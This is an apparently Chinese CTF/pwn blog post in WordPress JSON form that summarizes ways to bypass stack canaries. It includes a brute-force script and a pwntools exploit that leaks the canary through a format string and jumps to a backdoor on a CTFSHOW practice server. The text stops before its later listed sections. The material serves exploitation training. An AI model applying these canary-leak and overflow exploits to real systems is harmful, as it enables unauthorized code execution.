{"id":465,"date":"2024-12-14T18:24:10","date_gmt":"2024-12-14T10:24:10","guid":{"rendered":"http:\/\/8.141.27.105\/?p=465"},"modified":"2025-01-26T17:08:39","modified_gmt":"2025-01-26T09:08:39","slug":"pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/","title":{"rendered":"PWN|canary\u7ed5\u8fc7\u603b\u7ed3"},"content":{"rendered":"\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link 
ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#canary%E4%BF%9D%E6%8A%A4%E6%A6%82%E8%BF%B0%EF%BC%9A\" title=\"canary\u4fdd\u62a4\u6982\u8ff0\uff1a\">canary\u4fdd\u62a4\u6982\u8ff0\uff1a<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E7%A8%8B%E5%BA%8F%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AFcanary%EF%BC%9A\" title=\"\u5982\u4f55\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u5f00\u542fcanary\uff1a\">\u5982\u4f55\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u5f00\u542fcanary\uff1a<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#canary%E7%BB%95%E8%BF%87\" title=\"canary\u7ed5\u8fc7\">canary\u7ed5\u8fc7<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E7%88%86%E7%A0%B4\" title=\"\u7206\u7834\">\u7206\u7834<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#printf%E6%B3%84%E9%9C%B2canary\" title=\"printf\u6cc4\u9732canary\">printf\u6cc4\u9732canary<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E9%9C%B2canary\" title=\"\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary\">\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary<\/a><\/li><li 
class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E5%8A%AB%E6%8C%81_stack_chk_fail%E5%87%BD%E6%95%B0%E7%BB%95%E8%BF%87canary\" title=\"\u52ab\u6301___stack_chk_fail\u51fd\u6570\u7ed5\u8fc7canary\">\u52ab\u6301___stack_chk_fail\u51fd\u6570\u7ed5\u8fc7canary<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/14\/pwncanary%e7%bb%95%e8%bf%87%e6%80%bb%e7%bb%93\/#%E8%A6%86%E7%9B%96_libc_argv0\" title=\"\u8986\u76d6__libc_argv[0]\">\u8986\u76d6__libc_argv[0]<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"canary%E4%BF%9D%E6%8A%A4%E6%A6%82%E8%BF%B0%EF%BC%9A\"><\/span>canary\u4fdd\u62a4\u6982\u8ff0\uff1a<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p><a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/mitigation\/canary\/\">Canary &#8211; CTF Wiki<\/a><\/p>\n\n\n\n<p><em>\u6211\u4eec\u77e5\u9053\uff0c\u901a\u5e38\u6808\u6ea2\u51fa\u7684\u5229\u7528\u65b9\u5f0f\u662f\u901a\u8fc7\u6ea2\u51fa\u5b58\u5728\u4e8e\u6808\u4e0a\u7684\u5c40\u90e8\u53d8\u91cf\uff0c\u4ece\u800c\u8ba9\u591a\u51fa\u6765\u7684\u6570\u636e\u8986\u76d6 ebp\u3001eip \u7b49\uff0c\u4ece\u800c\u8fbe\u5230\u52ab\u6301\u63a7\u5236\u6d41\u7684\u76ee\u7684\u3002\u6808\u6ea2\u51fa\u4fdd\u62a4\u662f\u4e00\u79cd\u7f13\u51b2\u533a\u6ea2\u51fa\u653b\u51fb\u7f13\u89e3\u624b\u6bb5\uff0c\u5f53\u51fd\u6570\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u653b\u51fb\u6f0f\u6d1e\u65f6\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u8986\u76d6\u6808\u4e0a\u7684\u8fd4\u56de\u5730\u5740\u6765\u8ba9 shellcode \u80fd\u591f\u5f97\u5230\u6267\u884c\u3002\u5f53\u542f\u7528\u6808\u4fdd\u62a4\u540e\uff0c\u51fd\u6570\u5f00\u59cb\u6267\u884c\u7684\u65f6\u5019\u4f1a\u5148\u5f80\u6808\u5e95\u63d2\u5165 cookie 
\u4fe1\u606f\uff0c\u5f53\u51fd\u6570\u771f\u6b63\u8fd4\u56de\u7684\u65f6\u5019\u4f1a\u9a8c\u8bc1 cookie \u4fe1\u606f\u662f\u5426\u5408\u6cd5 (\u6808\u5e27\u9500\u6bc1\u524d\u6d4b\u8bd5\u8be5\u503c\u662f\u5426\u88ab\u6539\u53d8)\uff0c\u5982\u679c\u4e0d\u5408\u6cd5\u5c31\u505c\u6b62\u7a0b\u5e8f\u8fd0\u884c (\u6808\u6ea2\u51fa\u53d1\u751f)\u3002\u653b\u51fb\u8005\u5728\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u65f6\u5019\u5f80\u5f80\u4e5f\u4f1a\u5c06 cookie \u4fe1\u606f\u7ed9\u8986\u76d6\u6389\uff0c\u5bfc\u81f4\u6808\u4fdd\u62a4\u68c0\u67e5\u5931\u8d25\u800c\u963b\u6b62 shellcode \u7684\u6267\u884c\uff0c\u907f\u514d\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u3002\u5728 Linux \u4e2d\u6211\u4eec\u5c06 cookie \u4fe1\u606f\u79f0\u4e3a Canary\u3002<\/em>                                                                                             <\/p>\n\n\n\n<p>\u6765\u81eactf wiki<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E5%A6%82%E4%BD%95%E5%88%A4%E6%96%AD%E7%A8%8B%E5%BA%8F%E6%98%AF%E5%90%A6%E5%BC%80%E5%90%AFcanary%EF%BC%9A\"><\/span>\u5982\u4f55\u5224\u65ad\u7a0b\u5e8f\u662f\u5426\u5f00\u542fcanary\uff1a<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>1.\u901a\u8fc7checksec\u6765\u770b,\u4f46\u662f\u7ecf\u5e38\u4e0d\u51c6\u786e\u3002<\/p>\n\n\n\n<p>2.IDA\u53cd\u6c47\u7f16\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-74.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"615\" height=\"330\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-74.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-466\"  sizes=\"auto, (max-width: 615px) 100vw, 615px\" \/><\/div><\/figure>\n\n\n\n<p>v2\u5f88\u660e\u663e\u5c31\u662f\u4e2acanary\uff0c\u7279\u5f81\u662f\u6700\u540e\u4e00\u884c__readfsqword(0x28u) ^ v2;<\/p>\n\n\n\n<p>\u6c47\u7f16\u4ee3\u7801\u5982\u4e0b\u56fe\u6240\u793a\uff0c\u7ea2\u6846\u5185\u5c31\u662f__readfsqword(0x28u) ^ v2,\u542b\u4e49\u662f\u5c06canary\u4e0e\u521d\u59cb\u503c\u8fdb\u884c\u5f02\u6216\uff0c\u770b\u5224\u65ad\u6ca1\u6709\u88ab\u4fee\u6539\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EUVXCE@99XV6FJITB43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"756\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/EUVXCE@99XV6FJITB43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-467\"  sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"canary%E7%BB%95%E8%BF%87\"><\/span>canary\u7ed5\u8fc7<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E7%88%86%E7%A0%B4\"><\/span><strong>\u7206\u7834<\/strong><span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u7206\u7834canary\u7684\u6761\u4ef6\u975e\u5e38\u82db\u523b\uff0c\u56e0\u4e3acanary\u7684\u8fd0\u884c\u673a\u5236\u662f\u53ea\u8981\u68c0\u6d4b\u5230canary\u6709\u88ab\u7be1\u6539\uff0c\u7a0b\u5e8f\u5c31\u4f1a\u76f4\u63a5\u4e2d\u6b62\u3002\u901a\u5e38\u8981\u7206\u7834canary\u7684\u60c5\u51b5\u662f\u7528\u4e00\u4e2awhile\u6b7b\u5faa\u73af\u6765\u8c03\u7528fork\u51fd\u6570\u521b\u5efa\u5b50\u8fdb\u7a0b\uff0c\u5b50\u8fdb\u7a0b\u7684canary\u8ddf\u7236\u8fdb\u7a0b\u4e00\u81f4\uff0c\u5b50\u7a0b\u5e8f\u4e2d\u6b62\u540e\u56de\u5230\u7236\u8fdb\u7a0b\u7ee7\u7eed\u521b\u5efa\u5b50\u8fdb\u7a0b\uff0c\u6240\u4ee5\u624d\u5177\u5907\u7206\u7834canary\u7684\u53ef\u80fd\u6027\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/PIR92ALX6HE08K1D47X.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"323\" height=\"358\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/PIR92ALX6HE08K1D47X.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-468\" style=\"width:439px;height:auto\"  sizes=\"auto, (max-width: 323px) 100vw, 323px\" \/><\/div><\/figure>\n\n\n\n<p>\u7206\u7834\u6a21\u677f\uff0864\u4f4d\uff09\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>canary = b'\\x00'\nfor k in range(7):\n    for i in range(256):\n        payload = b'a' * 0x68 + canary + bytes(&#91;i])\n        io.send(payload)\n        data = io.recvuntil('welcome\\n')\n        
print(data)\n        if b\"fun\" in data:\n          canary += bytes(&#91;i])\n          print(\"canary is:\" + str(canary))\n          break<\/code><\/pre>\n\n\n\n<p>\u4f8b\u9898\u8be6\u89c1\uff1a2023CISCN funcanary:<\/p>\n\n\n\n<p><a href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/2024%e5%9b%bd%e5%9f%8e%e6%9d%af-pwn%e9%83%a8%e5%88%86wp-2\/\">2023CISCN PWN\u90e8\u5206WP \u2013 n0ps1ed&#8217;s website<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"printf%E6%B3%84%E9%9C%B2canary\"><\/span><strong>printf\u6cc4\u9732canary<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u5229\u7528printf\u4e0d\u9047\u5230\\x00\u4e0d\u7ec8\u6b62\u7684\u7279\u70b9\uff0c\u5982\u679c\u628acanary\u7684\u6700\u4f4e\u5b57\u8282\\x00\u8986\u76d6\u4e86\uff0c\u5c31\u80fd\u5728\u6253\u5370\u65f6\u5019\u987a\u5e26\u628a\u5b83\u6253\u5370\u51fa\u6765\uff0c\u7136\u540e\u51cf\u53bb\u7528\u6765\u8986\u76d6\\x00\u7684\u90a3\u4e00\u5b57\u8282\u7684\u503c\uff0c\u5c31\u80fd\u5f97\u5230canary\u539f\u503c\u3002<\/p>\n\n\n\n<p>\u4f8b\u9898\uff1a<\/p>\n\n\n\n<p><a href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/13\/%e6%9f%90%e6%a0%a1%e7%bd%91%e5%ae%89%e5%ae%9e%e8%b7%b5%e4%b8%89%e6%af%94%e8%b5%9bpwn\/\">\u67d0\u6821\u7f51\u5b89\u5b9e\u8df5(\u4e09)\u6bd4\u8d5b|PWN \u2013 n0ps1ed&#8217;s website<\/a>\uff08\u7b2c\u4e8c\u9898\uff09<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%B3%84%E9%9C%B2canary\"><\/span><strong>\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6cc4\u9732canary<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u6765\u7cbe\u51c6\u6cc4\u9732canary<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f8b\u9898\uff1aCTFSHOW PWN\u5165\u95e8 PWN98<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-75.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"333\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-75.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-469\"  sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u19bf00ae\">\u5f88\u660e\u663e\u7684fmt\u548cstack overflow\u3002\u800c\u4e14\u5f88\u5bb9\u6613\u770b\u51fa\u6765\u8fd9v2\u5c31\u662fcanary<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-77.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1014\" height=\"453\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-77.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-471\"  sizes=\"auto, (max-width: 1014px) 100vw, 1014px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u6b1dd7d4\">var_C\u5c31\u662fv2\uff0c\u5c06\u5b83\u4e0elarge 
gs:14h\u8fdb\u884c\u5f02\u6216\u64cd\u4f5c\uff0c\u7b49\u4e8e0\u5c31\u901a\u8fc7\u68c0\u6d4b\uff0c\u4e5f\u5c31\u662f\u770b\u8fd9\u4e24\u76f8\u4e0d\u76f8\u7b49\u3002<\/p>\n\n\n\n<p id=\"u4f0afbd2\">\u504f\u79fb\u662f5\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-76.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"756\" height=\"222\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-76.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-470\"  sizes=\"auto, (max-width: 756px) 100vw, 756px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u0e07f528\">s\u670940\u5b57\u8282\uff0c32\u4f4d\u7684\u8bdd\u662f4\u5b57\u8282\u4e00\u5355\u4f4d\uff0c\u90a3\u5c31\u662f\u5341\u4e2a\u5355\u4f4d\uff0c\u52a0\u4e0a\u504f\u79fb\u76845\u5c31\u662f15<\/p>\n\n\n\n<p id=\"u8b9a0883\">\u6c42canary1,canary2,canary3:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload=b'%14$p%15$p%16$p'\n\np.sendline(payload)\n\np.recvuntil('0x')\n\ncanary1=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary2=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary3=b'0x'+p.recv()\n\nprint(canary1)\n\nprint(canary2)\n\nprint(canary3)<\/code><\/pre>\n\n\n\n<p id=\"u2b284d41\"><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-79.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"968\" height=\"735\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-79.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-473\"  sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u886163f8\">\u4f46\u662f\u884c\u4e0d\u901a\uff0c\u540e\u6765\u53d1\u73b0\u72af\u4e86\u4e2a\u4f4e\u7ea7\u9519\u8bef\uff0ccanary\u662f\u4f4d\u7f6e\u5728ebp-0xC\uff0c\u5b83\u957f\u5ea6\u53c8\u4e0d\u662f0xC\uff0c\u53ea\u662f4\u5b57\u8282\u800c\u5df2\uff0c\u6240\u4ee5\u76f4\u63a5\u5c31\u662f%15$p<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-78.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"633\" height=\"339\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-78.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-472\"  sizes=\"auto, (max-width: 633px) 100vw, 633px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-80-1024x497.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"497\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/image-80-1024x497.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-474\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\n\nfrom LibcSearcher import*\n\n#\u8fde\u63a5\u8fdc\u7a0b\n\ncontext(arch = 'i386',os = 'linux',log_level = 'debug')\n\np=remote(\"pwn.challenge.ctf.show\",28260)\n\nelf=ELF('\/home\/monke\/ctfshowpwn\/pwn')\n\n#\u6c42canary\n\npayload=b'%14$p%15$p%16$p'\n\np.sendline(payload)\n\np.recvuntil('0x')\n\ncanary1=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary2=b'0x'+p.recvuntil('0x',drop=True)\n\ncanary3=b'0x'+p.recv()\n\nprint(canary1)\n\nprint(canary2)\n\nprint(canary3)\n\nbackdoor= elf.sym&#91;'__stack_check']\n\npayload2=cyclic(36)+p32(int(canary1,16))+p32(int(canary2,16))+p32(int(canary3,16))+cyclic(8)+p32(backdoor)\n\np.sendline(payload2)\n\np.interactive()\n\n<\/code><\/pre>\n\n\n\n<p id=\"uffb084b4\">\u6211\u7684exp\u91cc\u9762canary1\u548ccanary3\u90fd\u662f\u4e0d\u5fc5\u8981\u7684\uff0c\u6539\u4e0d\u6539\u90fd\u884c\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 